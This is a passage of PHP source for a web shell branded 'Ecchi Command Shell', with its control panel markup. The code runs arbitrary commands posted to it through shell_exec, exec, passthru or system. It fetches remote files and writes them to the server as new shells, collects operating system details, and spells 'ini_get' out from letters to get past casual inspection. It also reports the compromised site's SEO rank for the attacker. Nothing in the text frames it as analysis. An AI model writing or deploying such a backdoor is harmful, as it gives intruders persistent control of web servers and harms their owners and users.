ExeCmd($_POST['function'], $_POST['cmd']); } else if (!empty($_POST['filename']) && !empty($_POST['url'])) { $this->newShell($_POST['filename'], $_POST['url']); } } /** * Summary of newShell * @return null */ private function newShell($filename, $url) { $getFile = file_get_contents($url); if (!file_exists($filename)) { file_put_contents($filename, $getFile); } else { $openFile = fopen($filename, "w"); fwrite($openFile, $getFile); fclose($openFile); } $this->setResult("Success Create File " . $filename . " at " . str_replace("\\", "/", dirname(__FILE__) . "/" . $filename) . ""); } /** * Summary of cURL * @param mixed $url * @param mixed $postFields * @param mixed $post * @return bool|string */ private function cURL($url, $post = false, $postFields = []) { $ch = curl_init(); if ($post) { curl_setopt_array($ch, [ CURLOPT_URL => $url, CURLOPT_POST => true, CURLOPT_POSTFIELDS => http_build_query($postFields) ]); } else { curl_setopt_array($ch, [ CURLOPT_URL => $url, CURLOPT_CUSTOMREQUEST => 'GET' ]); } curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $respone = curl_exec($ch); curl_close($ch); return $respone; } /** * Summary of SEORank * @return array|string|null */ public function SEORank() { $postData = [ "getStatus" => "1", "siteID" => "1", "sitelink" => $_SERVER['SERVER_NAME'], "da" => "1", "pa" => "1", "alexa" => "1" ]; $getRank = $this->cURL("https://www.checkmoz.com/bulktool", true, $postData); preg_match_all('/(.*?)<\/td>/', $getRank, $get); $getSEO = preg_replace('//', '', $get[1]); return $getSEO; } /** * Summary of getDisable * @param mixed $act * @return mixed */ public function getDisable($act = null) { define("low", range("a", "z")); $in = low[8] . low[13] . low[8] . "_" . low[6] . low[4] . low[19]; if ($act == 'UI') { return $in("disable_functions") ?: 'Nothing'; } else { return $in("disable_functions"); } // return ($act === 'UI') ? ($in("disable_functions") ?? 'Nothing') : $in("disable_functions"); } /** * Summary of getOS * @return string */ public function getOS() { return strtoupper(substr(PHP_OS, 0, 3)) === 'WIN' ? 'Windows' : 'Linux'; } /** * Summary of getInformationSystem * @return string */ public function getInformationSystem() { $information_system = ''; $os = $this->getOS(); switch ($os) { case 'Linux': $information_system = php_uname(); break; default: if (class_exists('COM')) { $wmi = new COM('winmgmts://'); $os = $wmi->ExecQuery('SELECT * FROM Win32_OperatingSystem'); foreach ($os as $os_info) { $information_system .= 'Operating System: ' . $os_info->Caption . PHP_EOL; $information_system .= 'Kernel Type: ' . $os_info->OSArchitecture . PHP_EOL; $version = explode(".", $os_info->Version); $information_system .= 'Version: ' . $version[0] . '.' . $version[1] . PHP_EOL; } } else { $result = []; $exectution = "exec"; $exectution('systeminfo', $result); if (!empty($result)) { foreach ($result as $line) { switch (true) { case (strpos($line, 'OS Name:') !== false): $os_name = trim(str_replace('OS Name:', '', $line)); $information_system .= "
Operating System: " . $os_name . PHP_EOL; break; case (strpos($line, 'System Type:') !== false): $kernel_type = trim(str_replace('System Type:', '', $line)); $information_system .= '
Kernel Type: ' . $kernel_type . PHP_EOL; break; case (strpos($line, 'Version:') !== false && strpos($line, 'BIOS Version:') === false): $version = trim(str_replace('Version:', '', $line)); $information_system .= '
Version: ' . $version . PHP_EOL; break; case (strpos($line, 'Host Name') !== false): $host_name = trim(str_replace('Host Name:', '', $line)); $information_system .= '
User: ' . $host_name . PHP_EOL; break; case (strpos($line, 'BIOS Version:') !== false): $bios = trim(str_replace('BIOS Version:', '', $line)); $information_system .= '
Bios: ' . $bios . PHP_EOL; break; default: break; } } } else { $information_system = "Can't Get Information System"; } } break; } return $information_system; } /** * Summary of ExeCmd * @param mixed $command * @param mixed $payload * @return null */ private function ExeCmd($command, $payload) { $split = explode(",", $this->getDisable()); if (in_array($command, $split)) { $this->setResult("Function Is Disable : $command"); } else { if ($command == 'shell_exec') { $this->result = $command($payload); } else if ($command == 'exec') { $command($payload, $this->result); $this->result = join("\n", $this->result); } else if ($command == 'passthru' || 'system') { ob_start(); $command($payload); $this->result = ob_get_contents(); ob_end_clean(); } else { $this->result = call_user_func_array($command, $payload); } $this->setResult($this->result); } } /** * Summary of getServerSoftware * @return mixed */ public function getServerSoftware() { return isset($_SERVER['SERVER_SOFTWARE']) ? $_SERVER['SERVER_SOFTWARE'] : null; } public function getPHPVersion() { return phpversion(); } /** * @return mixed */ public function getResult() { return $this->result; } /** * @param mixed $result * @return self */ public function setResult($result): self { $this->result = $result; return $this; } } $ecchishell = new EcchiShell; ?> Ecchi Command Shell
Server Info

Rank Alexa : SEORank()[4] ?> | DA : SEORank()[2] ?> | PA : SEORank()[3] ?>

OS : getOS() ?>

PHP Version : getPHPVersion() ?>

Software : getServerSoftware() ?>

Information System : getInformationSystem() ?>

Ecchi Command Shell

Disable Functions

getDisable("UI") ?>

Command Execution
Create File
Result

getResult() ?>

./EcchiExploit